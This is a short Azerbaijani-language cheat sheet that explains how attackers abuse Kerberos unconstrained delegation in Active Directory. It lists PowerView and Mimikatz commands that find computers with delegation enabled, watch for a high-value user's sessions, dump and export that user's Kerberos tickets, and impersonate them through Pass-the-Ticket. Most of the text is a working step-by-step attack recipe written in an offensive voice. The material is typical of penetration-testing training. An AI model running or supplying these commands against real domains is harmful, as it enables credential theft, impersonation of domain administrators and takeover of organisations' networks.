Unconstrained Delegation

Unconstrained Delegation (Məhdudiyyətsiz Nümayəndəlik) Microsoftun Active Directory (AD) mühitində xidmət və ya istifadəçi hesabına, istifadəçinin etimadnaməsini heç bir məhdudiyyət olmadan şəbəkədəki digər xidmətlərə yönləndirməyə imkan verən funksiyadır. Bu o deməkdir ki, bir xidmət hesabına 'Unconstrained Delegation' verildikdən sonra o, bir istifadəçini təqlid edə və digər xidmətlərə autentifikasiya etmək üçün onun etimadnamələrindən istifadə edə bilər.

Məhdudiyyətsiz Nümayəndəliyin aktivləşdirildiyi maşına administrativ girişimiz varsa, yüksək dəyərli hədəfin qoşulmasını gözləyə, onun TGT'sini oğurlayıb, Pass-the-Ticket hücumu həyata keçirə və həmin istifadəçini təqlid edə bilərik.

PowerView

Aşağıdakı əmr ilə domenə qoşulmuş Məhdudiyyətsiz Nümayəndəliyi aktiv olan kompüterləri əldə edə bilərik:

Get-NetComputer -UnConstrained

Mimikatzdan istifadə edərək biletləri ekrana yazdırmaq və Domen Administratorunun (DA) və ya digər yüksək dəyərli istifadəçilərin Ticket Granting Ticket (TGT) saxlayıb-saxlamadığını yoxlamaq üçün:

Invoke-Mimikatz -Command '"sekurlsa::tickets"'

''UserHunter"dən istifadə edərək serverə daxil olan sessiyaları izləmək üçün:

Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay
<WaitInterval> -Verbose

Mimikatz'dan istifadə edərək biletləri diskə dump etmək üçün:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Pass-the-Ticket (Mimikatz aləti ilə) hücumu vasitəsilə istifadəçini təqlid etmək:

Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"'